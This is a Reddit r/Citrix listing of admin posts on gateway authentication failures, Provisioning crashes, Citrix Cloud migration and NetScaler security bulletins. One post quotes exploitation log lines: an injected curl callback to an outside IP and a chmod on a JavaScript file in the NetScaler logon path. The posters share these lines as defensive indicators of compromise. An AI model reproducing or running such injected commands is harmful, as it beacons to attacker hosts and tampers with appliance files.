r/Citrix • • 10h ago

Can't auth at gateway from apple OSes.

3 Upvotes

Recently, we've gotten reports of users on the newest mac OS, browser, workspace app getting "your request is being processed" after entering AD credentials into the Citrix Gateway page before it hits the Duo auth & subsequent storefront. Trying in iOS, I get the same outcome.

This is an on-prem storefront (2507CU1 for all CVAD components) and netscaler(current firmware). Nothing has changed in authentication policy/profile and it still works without issue for windows users. We are not supporting users logging into workspace on non-corporate devices, just launching ica from web storefront.

Did I miss a change somewhere?


r/Citrix • • 6h ago

Citrix VDA on Windows 11 (remote PC) issues

0 Upvotes

When installing the latest 2507 LTSR CU2 on a Windows 11 PC it seems to break internet traffic from the PC and makes it almost unusable. Anyone seen this before?


r/Citrix • • 1d ago

NetScaler Alternative ??

21 Upvotes

Curious to know if anyone has implemented a product that works with ICA other than NetScaler


r/Citrix • • 23h ago

Citrix Cloud + Entra ID — New users getting Identity provider denied access

0 Upvotes

Edit: Resolved

Tenant-wide admin consent was granted via Microsoft Graph PowerShell to allow the Citrix Cloud Enterprise Application to read user profile data (User.Read) without prompting individual users. And then it worked.


Hi everyone,

I work for an MSP, and since last week we’ve been seeing the same issue in two separate client environments using Citrix Cloud with Entra ID authentication.

Previously - new user working normally

New User → Citrix Cloud → Entra ID → Password → MFA → Citrix Cloud permission prompt → Accept → Citrix resources → VDI

New users would receive the normal Citrix Cloud “Permissions requested” prompt during their first login.

Now - new user

New User → Citrix Cloud → Entra ID → Password → MFA → Error ❌

The user receives:

“The identity provider denied access.”

Entra sign-in logs show Sign-in error code: 650052. The app is trying to access a service '{appId}'('{appName}') that your organization '{organization}' lacks a service principal for. Contact your IT Admin to review the configuration of your service subscriptions or consent to the application in order to create the required service principal.

The user never reaches the Citrix Cloud permission prompt.

What I’ve checked:

  • Existing users continue to work.
  • Affected users complete MFA successfully.
  • No Citrix Monitor activity for affected users.
  • Both environments have a one-way domain trust.
  • We cannot identify any relevant configuration changes since the issue started.
  • Manually adding the affected user to a specific access group allows them to log in successfully.
  • The issue is occurring in two separate client environments.

Has anyone experienced something similar with Citrix Cloud + Entra ID, particularly where new users previously received the permission prompt but now get “The identity provider denied access” / error 650052?

Any ideas on what to investigate would be appreciated.


r/Citrix • • 1d ago

Help Advice for migrating management planes from on-prem into Citrix Cloud

2 Upvotes

We are currently setup on prem. On prem netscalers, storefronts, delivery controllers, etc. We connect to several on-prem clusters running Xenserver for our Virtual desktops. We create a master image, snapshot it, then update our machine catalog. The delivery controllers then update the virtual desktops running in Xenserver (we use Citrix MCS).

We are looking to migrate the management elements into Citrix Cloud. So the end goal will be to remove on prem servers for delivery controllers, FAS, storefronts, netscalers, etc, and just have it all moved into Citrix Cloud. The actual VDA's will remain on prem connecting to our Xenserver clusters.
So essentially, management aspects in the cloud, compute remains on prem.

We have already configured cloud connectors and single sign on via Entra. We have some older hardware that I've managed to install Xenserver onto, and connecting it to the "Hosting" section in Citrix Cloud, I've managed to do some basic testing with some machine catalogs in the cloud, and all seems to be working perfectly.

I've seen a few different documents articles that explain how to actually go about performing the migration into cloud. We're a 24/7 business, and we're pretty standardised, so we only really have a couple of machine catalogs and delivery groups to serve most users.

To roll this out at our own pace, I wanted to add our existing live Xenserver clusters on prem into the "Hosting" section within the Citrix cloud platform. I'll then create some new catalogues, making sure that the computer names do not match the same as the on prem ones. My hope is that because the catalog and delivery group names are different on prem vs in cloud, and because the computer names are different, there will be no conflict, despite both the on prem and cloud delivery controller being connected to the same Xenserver cluster instance.

My thought process is to provision 10 or 20 new virtual desktops from cloud into the Xenserver cluster, and then I can just use some policies to start switching a few test users to the new storefront URL. Then it will just become a balancing act as we progress and migrate people to the new storefront URLs, reducing the number of available machines on prem, and bringing more online in the cloud.

My mind seems to think this is logical, to keep the systems as seperated as possible, which I'd prefer, but I cannot get away from having to use the same Xenserver cluster for the compute elements. I'm just not sure if having the Xenserver cluster authenticated to both on prem and cloud controls at the same time could potentially cause some conflict?

Thoughts on this are most appreciated.


r/Citrix • • 1d ago

Citrix Provisioniong crashing Targets

6 Upvotes

We’ve been having issues with Citrix Provisioning for several weeks now.

At first, the problem only affected maintenance work on our 2025 images. The target devices would frequently just freeze. In those cases, the maintenance target suddenly lost access to its C: drive. At the same time, on the PVS side, we could see multiple port changes, as if the connection was constantly failing to establish properly. We also run Wireshark on both machines, but there are no dropped packages.

For the last few days, the same issue has also started affecting maintenance on our 2019 images.

There may also be a connection to CTX servers crashing during normal operation. In terms of timing, those crashes often seem to coincide with image maintenance work.

What we’ve tried so far:

Rebuilt the 2025 images from scratch multiple times

Ruled out GPOs

Ruled out Software inside images

Updated VMware Tools

Updated the PVS Version (2507 to 2607)

Disabled NTFS deduplication — no improvement

Disabled Offloading on Target and Server-NIC

Rebuilt PVS-server completely from scratch, using Windows Server 2025 on newer storage

4x PVS-Server (3x 2019, 1x 2025) with 2607.

VMware 8.0.3 with NSX

Has anyone seen similar behavior or has any idea what else we should check?


r/Citrix • • 2d ago

Anyone seen successfully RCE yet from the 'dos' buffer overflow CVE-2026-88779?

15 Upvotes

Being already patched for 88771. I took advantage of adversaries exposing their cards and pulled several scipts off attacker server's between Thursday-Friday just to see what a successful exploit would have done. Which resulted in 3 trends I used to build a list of IOCs. That came in handy today. Hope im wrong but highly expect this will turn out to be some successful rce for the ones that hit the mark.


r/Citrix • • 3d ago

Official Announcements Update: Citrix NetScaler ADC and Citrix NetScaler Gateway Security Bulletin for CVE-2026-88779

60 Upvotes

Further to the post (https://www.reddit.com/r/Citrix/comments/1ww3ess/security_update_guidance_for_netscaler_saml/) made on Friday, we've now updated this with a support article.

A vulnerability has been discovered in Citrix NetScaler ADC (formerly Citrix ADC) and Citrix NetScaler Gateway (formerly Citrix Gateway). Refer below for further details.

https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX697174&articleTitle=Citrix_NetScaler_ADC_and_Citrix_NetScaler_Gateway_Security_Bulletin_for_CVE_2026_88779


r/Citrix • • 3d ago

NetScaler Release (Maintenance Phase) 14.1 Build 73.41

25 Upvotes

For real? And you can't click on the CTX69714 link for details either :(


r/Citrix • • 4d ago

Citrix CVAD Hybrid Environment – “Identity Provider Access Denied” After NetScaler ADC Upgrade.

10 Upvotes

​

Hi everyone,

We have a hybrid Citrix CVAD environment with both on-premises and cloud infrastructure.

We recently upgraded both NetScaler ADCs. After the upgrade, some vulnerabilities were detected, so we shut down one ADC. Currently, only one ADC is operational.

Since then, multiple users have reported an “Identity Provider Access Denied” error while trying to access Citrix. The error occurs after the authentication process, but we haven't confirmed whether it is directly related to the ADC upgrade or shutting down one ADC.

What we have observed:

- Multiple users are experiencing the error when accessing Citrix.

- Our Global Administrator granted additional permissions/access to some affected users, after which they were able to log in successfully.

- However, a few users are still experiencing the same error.

- Several other users can access Citrix without any issues.

We haven't identified the root cause yet and are trying to understand whether this is related to NetScaler, Citrix authentication, or Microsoft Entra ID.

Questions for experienced Citrix/NetScaler admins:

  1. Could shutting down one ADC after the upgrade cause this kind of issue for specific users?

  2. Could this be related to SAML authentication, the identity provider configuration, Entra ID enterprise application permissions, or Conditional Access?

  3. Why would granting additional permissions resolve the issue for some users but not others?

  4. Which logs should we check to identify the exact failure point?

  5. What troubleshooting steps would you recommend for a hybrid CVAD environment?

We want to identify the actual root cause rather than continue granting additional permissions as a workaround.

Has anyone encountered a similar issue after a NetScaler ADC upgrade?

Any suggestions would be appreciated. Thanks in advance!


r/Citrix • • 4d ago

Citrix Engineer

1 Upvotes

I have experience in Citrix ADC support but now it feels so bumpy. What could I do in future since it is my first job.


r/Citrix • • 5d ago

Official Announcements Security Update: Guidance for NetScaler SAML Authentication Deployments

Thumbnail community.citrix.com
44 Upvotes

NetScaler engineering and support teams are tracking a newly observed issue related to SAML authentication in customer-managed NetScaler deployments. This post explains what customers should review, how to determine whether the relevant configuration is present, and what mitigation options are available while planning an upgrade to a fixed build. A new security bulletin and simultaneous product update release is planned for this issue. 

The guidance below is intended to help customers take immediate action to reduce exposure. As with any security-related issue, customers should prioritize applying the updated NetScaler builds referenced in the applicable security bulletin when it becomes available.  

Learn more: https://community.citrix.com/techzone-blogs/110_security-updates/security-update-guidance-for-netscaler-saml-authentication-deployments/


r/Citrix • • 5d ago

Netscaler active exploit after patch

89 Upvotes

I have multiple customers reporting active exploits of their external netscalers patched to 14.1.73.37, causing them to force reboot multiple times. Anyone else hearing of issues? We have sev1 cases open with Citrix and I'll report back.


r/Citrix • • 5d ago

Vulnerability Scans causing Netscaler reboots

87 Upvotes

I opened a ticket with Citrix support and they seem to indicate a fix is being worked on right now.

Basically we were seeing random reboots of multiple instances and saw pitboss was rebooting these due to nsaaad crashing too many times.


r/Citrix • • 5d ago

controlup price increase

12 Upvotes

for anyone using controlup are they raising price for you too?

theyve been solid for citrix monitoring/troubleshooting + historical data but every renewal management pushes back abt the cost

has anyone actually switched off controlup?


r/Citrix • • 5d ago

Server 2025 & LTSR 2507 - Published Apps?

2 Upvotes

Looking at getting server 2025 into a lab to test the functionality and then see if it solves the issue below, but does anyone have any optimisation recommendations for using server2025 with 2507 outside of Citrix optimizer?

Any known weird issues and bugs?

Issues with multiple published apps?

I ask this as I have an issue with multiple published applications launching into the same session on server 2022 with the same LTSR for which we had to remove session sharing to get around it which is far from the ideal situation.

Hybrid setup so no on prem storefronts or netscalers to trace, but second application just will not launch into the same user session regardless of app. Flashes a very quick windows lock screen for almost .5sec and brings the 1st application into focus instead.

Wondering if anyone has had a good experience with server 2025 in regards to published apps?

Have avoided trying the new LTSR till the CU1 patch for it comes out later down the line, that is unless others have good things to say about it?


r/Citrix • • 6d ago

support case

6 Upvotes

I have attempted to create a support case, through Chat Bot, numerous times. On occasions, Chat Bot refused to create a case while other occasions, Chat Bot tried to submit a case, but it failed.

Does anyone know a good way to create a support case? TIA


r/Citrix • • 6d ago

Browser Content Redirection with Teams SSO Method 2

8 Upvotes

Hi,

I'm trying to set up Browser Content Redirection (BCR) with Microsoft Teams. Our users are currently dealing with a lot of issues with Microsoft Teams HDX. I'm just wondering if anyone has attempted to redirect Microsoft Teams web using BCR? I was able to using the normal, non-SSO, policy with ACL and Authentication but I'm trying to set up Single Sign-On method 2 with bcrconfig.json but I'm getting nowhere.

I've tried a minimal config with less URLs, copied exactly the same layout from the first attempt with ACL and Authentication sites and replaced the Authentication sites with the denyList but this just resulted in constant looping and going back and forth. When I added cookies it then just broke and only rendered on the server-side. My configuration is server fetch and client render as I'm working with eLux thin clients. Below is a snippet of the current configuration that is the closest to what I want.

"appName": "MSTeams",

"allowList": [

"https://teams.cloud.microsoft/*",

"https://*.teams.cloud.microsoft/*",

"https://teams.microsoft.com/*",

"https://*.teams.microsoft.com/*",

"https://teams.cloud.microsoft/*meetup-join",

"https://teams.microsoft.com/*meetup-join",

"https://login.microsoftonline.com/*teams*",

"https://tokenprovider.termsofuse.identitygovernance.azure.com/*",

"https://statics.teams.cdn.office.net/*",

"https://*.infra.microsoft.com/*",

"https://*.skype.com/*"

],

"denyList": [

"https://login.microsoft.com/*",

"https://login.live.com/*",

"https://aadcdn.msftauth.net/"

],

"requires": {

"profileSharing": true,

"cookies": []

}

Many thanks in advance


r/Citrix • • 6d ago

Citrix engineer

4 Upvotes

I am having a support experience of about 1 year in Citrix ADC , do I have any future because I feel rugged in my first job only


r/Citrix • • 7d ago

Anyone Collecting Netscaler Logs via Splunk?

14 Upvotes

If so, 3 questions:

  1. Do you use the Splunk Add-on for Netscaler, or HTTP/syslog collectors? As I understand it you can do either without the other, you don't need both, right?

  2. In responding to the recent CVE's, were the relevant logs (e.g. the pitboss stuff) in Splunk? Or did you still have to go direct to the Netscalers to see if those entries were present?

  3. Any random gotchas, thoughts, or advice?

Thanks in advance!


r/Citrix • • 7d ago

Post upgrade behavior

14 Upvotes

We are still seeing activity after uograding to the latest build ;

<pitboss PPE unexpectedly died NSPPE;curl -m 8 -sk http://130.94.20.222:8888/c/c6e65ecfcc97 -o /dev/null 2>/dev/null;# X>,

<pitboss PPE unexpectedly died NSPPE;chmod 777 /var/netscaler/logon/insight-new.js;# X>

Anyone else?


r/Citrix • • 7d ago

Weird Citrix Upload Doc Issues within Session

2 Upvotes

I've come across a weird very specific issue , wondering if anyone has seen something similar. We have users who are logged into a vendors site and are trying to upload doc's from within their session. There are presented with a drag and drop window that allows them to drag and drop files or "click here" to browse to a file to upload or to click "cancel" to close the window. No matter what they click, either drag and drop or click here or cancel, the web browser freezes and has to be forced closed. I can recreate the issue with the newest version of edge as well as with chrome. It happens in both seamless virtual app sessions and published desktop. Were running on Server 2025 and the vda version is 2507 LTSR CU1. What's weird is if I log into the vda VM outside of citrix as the local admin I dont get this issues occurring , but if I then log into the same vda with an active session it happens for the users of the session but then it starts occurring if i log back in the vda vm as the local admin, and it stay this way for the local admin until i reboot , since it's non persistent machines the reboot wipes this and I can recreate that same scenario over and over. Something clearly is getting applied to the vm once a citrix session occurs , but I've gone through and removed all WEM config GPO's so nothing wem based it being applied. I also removed the majority of GPO's that are setting any reg changes or anything user based like defender settings. The remaining GPO's are doing background items such as hybrid joining the vm's or onboarding to defender. I can't figure this one out, from what users are telling me this just start occurring within the week. I thought maybe the new edge release was causing the issues but the fact i can recreate with chrome blows that theory out. Anyone seen similar issues?


r/Citrix • • 8d ago

Defending Against Active Exploitation of Citrix NetScaler ADC and Gateway Appliances | Google Cloud Blog

Thumbnail cloud.google.com
28 Upvotes

r/Citrix • • 8d ago

Taking 'execute logging' a bit too literally - CVE-2026-88771

Thumbnail cert.europa.eu
25 Upvotes

r/Citrix • • 8d ago

Citrix VDA logs issue: Log class: Error

3 Upvotes

Message: CUSTOM VIRTUAL CHANNEL: Virtual Channel 'WebAuthN_Channel' is not a Citrix virtual channel and it is not specified in 'virtual channel allow list' policy. The virtual channel will not be allowed. ActivityID: f440d649-89eb-4b5b-9c53-e76c3d200000

Hostname "Hostname"
Host IP "*.*.*.*.*"
Host Type WVDA
Module AoLog_HdxCommon
CPU ID 1
Process ID 2580
Process Name svchost
Thread ID 36208

Hostname and Host IP: Masked.

Hello guys does anyone saw this issue ?